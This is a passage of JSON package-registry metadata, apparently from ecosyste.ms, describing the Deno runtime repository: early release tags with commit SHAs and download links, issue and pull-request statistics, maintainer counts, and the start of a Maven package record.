ste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T11:44:11.695Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":58.51358846367166,"stargazers_count":0.0,"forks_count":0.07395082270290257,"average":14.646884821593641},"purl":"pkg:deno/deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/deno/deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/deno/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/deno/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages/deno/codemeta","maintainers":[],"registry":{"name":"deno.land","url":"https://deno.land","ecosystem":"deno","default":true,"packages_count":5909,"maintainers_count":0,"namespaces_count":0,"keywords_count":4101,"github":"denoland","metadata":{"funded_packages_count":920},"icon_url":"https://github.com/denoland.png","created_at":"2022-04-20T15:35:43.723Z","updated_at":"2026-08-31T05:06:26.035Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/deno.land/namespaces"}},{"id":12401479,"name":"org.mvnpm.at.deno:darwin-x64","ecosystem":"maven","description":"darwin-x64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":17,"first_release_published_at":"2025-10-20T11:29:27.000Z","latest_release_published_at":"2026-08-07T02:42:00.000Z","latest_release_number":"2.9.5","last_synced_at":"2026-08-28T22:50:23.494Z","created_at":"2025-10-20T11:46:22.614Z","updated_at":"2026-08-28T22:50:23.495Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/darwin-x64/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/darwin-x64/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno